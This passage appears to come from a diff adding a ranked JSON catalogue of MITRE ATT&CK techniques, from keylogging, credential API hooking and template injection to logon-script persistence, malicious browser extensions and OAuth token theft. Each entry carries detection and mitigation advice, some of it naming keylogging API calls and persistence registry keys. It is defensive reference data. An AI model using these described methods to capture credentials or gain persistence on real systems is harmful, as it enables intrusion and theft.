", + "url": "https://attack.mitre.org/techniques/T1056/001", + "detection": "Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include SetWindowsHook, GetKeyState, and GetAsyncKeyState.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.", + "mitigations": [] + }, + { + "tid": "T1056.002", + "name": "Input Capture: GUI Input Capture", + "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: Bypass User Account Control).\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and PowerShell.(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. Unix Shell).(Citation: Spoofing credential dialogs) ", + "url": "https://attack.mitre.org/techniques/T1056/002", + "detection": "Monitor process execution for unusual programs as well as malicious instances of Command and Scripting Interpreter that could be used to prompt users for credentials. For example, command/script history including abnormal parameters (such as requests for credentials and/or strings related to creating password prompts) may be malicious.(Citation: Spoofing credential dialogs) \nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources. ", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1056.003", + "name": "Input Capture: Web Portal Capture", + "description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through External Remote Services and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)", + "url": "https://attack.mitre.org/techniques/T1056/003", + "detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1056.004", + "name": "Input Capture: Credential API Hooking", + "description": "Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike Keylogging, this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\n
    \n
  • Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
    • \n
  • Import address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
    • \n
  • Inline hooking, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
    • \n
", + "url": "https://attack.mitre.org/techniques/T1056/004", + "detection": "Monitor for calls to the SetWindowsHookEx and SetWinEventHook functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)", + "mitigations": [] + } + ] + }, + { + "rank": 82, + "tid": "T1221", + "name": "Template Injection", + "description": "Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\nAdversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)\nThis technique may also enable Forced Authentication by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)", + "url": "https://attack.mitre.org/techniques/T1221", + "detection": "Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: PowerShell), or other suspicious actions that could relate to post-compromise behavior.", + "score": 0.8050380952380953, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + } + ], + "subtechniques": [] + }, + { + "rank": 83, + "tid": "T1052", + "name": "Exfiltration Over Physical Medium", + "description": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.", + "url": "https://attack.mitre.org/techniques/T1052", + "detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.", + "score": 0.8050380952380953, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1034", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "url": "https://attack.mitre.org/mitigations/M1034" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + } + ], + "subtechniques": [ + { + "tid": "T1052.001", + "name": "Exfiltration Over Physical Medium: Exfiltration over USB", + "description": "Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.", + "url": "https://attack.mitre.org/techniques/T1052/001", + "detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.", + "mitigations": [ + { + "mid": "M1034", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "url": "https://attack.mitre.org/mitigations/M1034" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + } + ] + } + ] + }, + { + "rank": 84, + "tid": "T1195", + "name": "Supply Chain Compromise", + "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\nSupply chain compromise can take place at any stage of the supply chain including:\n
    \n
  • Manipulation of development tools
    • \n
  • Manipulation of a development environment
    • \n
  • Manipulation of source code repositories (public or private)
    • \n
  • Manipulation of source code in open-source dependencies
    • \n
  • Manipulation of software update/distribution mechanisms
    • \n
  • Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware)
    • \n
  • Replacement of legitimate software with modified versions
    • \n
  • Sales of modified/counterfeit products to legitimate distributors
    • \n
  • Shipment interdiction
    • \n
\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)", + "url": "https://attack.mitre.org/techniques/T1195", + "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.", + "score": 0.8041482750333333, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1016", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "url": "https://attack.mitre.org/mitigations/M1016" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "subtechniques": [ + { + "tid": "T1195.001", + "name": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) \nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ", + "url": "https://attack.mitre.org/techniques/T1195/001", + "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ", + "mitigations": [ + { + "mid": "M1016", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "url": "https://attack.mitre.org/mitigations/M1016" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1195.002", + "name": "Supply Chain Compromise: Compromise Software Supply Chain", + "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) ", + "url": "https://attack.mitre.org/techniques/T1195/002", + "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ", + "mitigations": [ + { + "mid": "M1016", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "url": "https://attack.mitre.org/mitigations/M1016" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1195.003", + "name": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "description": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.", + "url": "https://attack.mitre.org/techniques/T1195/003", + "detection": "Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.", + "mitigations": [ + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + } + ] + } + ] + }, + { + "rank": 85, + "tid": "T1011", + "name": "Exfiltration Over Other Network Medium", + "description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network", + "url": "https://attack.mitre.org/techniques/T1011", + "detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.", + "score": 0.7996666666666667, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ], + "subtechniques": [ + { + "tid": "T1011.001", + "name": "Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth", + "description": "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel.\nAdversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.", + "url": "https://attack.mitre.org/techniques/T1011/001", + "detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + } + ] + }, + { + "rank": 86, + "tid": "T1037", + "name": "Boot or Logon Initialization Scripts", + "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. \nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.", + "url": "https://attack.mitre.org/techniques/T1037", + "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "score": 0.7935366283514285, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ], + "subtechniques": [ + { + "tid": "T1037.001", + "name": "Boot or Logon Initialization Scripts: Logon Script (Windows)", + "description": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript Registry key.(Citation: Hexacorn Logon Scripts)\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ", + "url": "https://attack.mitre.org/techniques/T1037/001", + "detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "mitigations": [ + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ] + }, + { + "tid": "T1037.002", + "name": "Boot or Logon Initialization Scripts: Logon Script (Mac)", + "description": "Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike Startup Items, a login hook executes as the elevated root user.(Citation: creating login hook)\nAdversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. ", + "url": "https://attack.mitre.org/techniques/T1037/002", + "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1037.003", + "name": "Boot or Logon Initialization Scripts: Network Logon Script", + "description": "Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. \nAdversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.", + "url": "https://attack.mitre.org/techniques/T1037/003", + "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1037.004", + "name": "Boot or Logon Initialization Scripts: RC Scripts", + "description": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.\nAdversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.\nAdversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)\nSeveral Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of Launchd. (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)", + "url": "https://attack.mitre.org/techniques/T1037/004", + "detection": "Monitor for unexpected changes to RC scripts in the /etc/ directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.\nMonitor for /etc/rc.local file creation. Although types of RC scripts vary for each Unix-like distribution, several execute /etc/rc.local if present. ", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1037.005", + "name": "Boot or Logon Initialization Scripts: Startup Items", + "description": "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)\nThis is technically a deprecated technology (superseded by Launch Daemon), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.", + "url": "https://attack.mitre.org/techniques/T1037/005", + "detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.\nMonitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + } + ] + }, + { + "rank": 87, + "tid": "T1176", + "name": "Browser Extensions", + "description": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)\nOnce the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)", + "url": "https://attack.mitre.org/techniques/T1176", + "detection": "Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.\nMonitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.\nOn macOS, monitor the command line for usage of the profiles tool, such as profiles install -type=configuration. Additionally, all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory. Ensure all listed files are in alignment with approved extensions.(Citation: xorrior chrome extensions macOS)", + "score": 0.7828779356390476, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1033", + "name": "Limit Software Installation", + "description": "Block users or groups from installing unapproved software.", + "url": "https://attack.mitre.org/mitigations/M1033" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "subtechniques": [] + }, + { + "rank": 88, + "tid": "T1528", + "name": "Steal Application Access Token", + "description": "Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through Spearphishing Link to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through Application Access Token.(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)\nAdversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)", + "url": "https://attack.mitre.org/techniques/T1528", + "detection": "Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.\nSecurity analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.\nAdministrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.", + "score": 0.7738095238095237, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [] + }, + { + "rank": 89, + "tid": "T1550", + "name": "Use Alternate Authentication Material", + "description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical 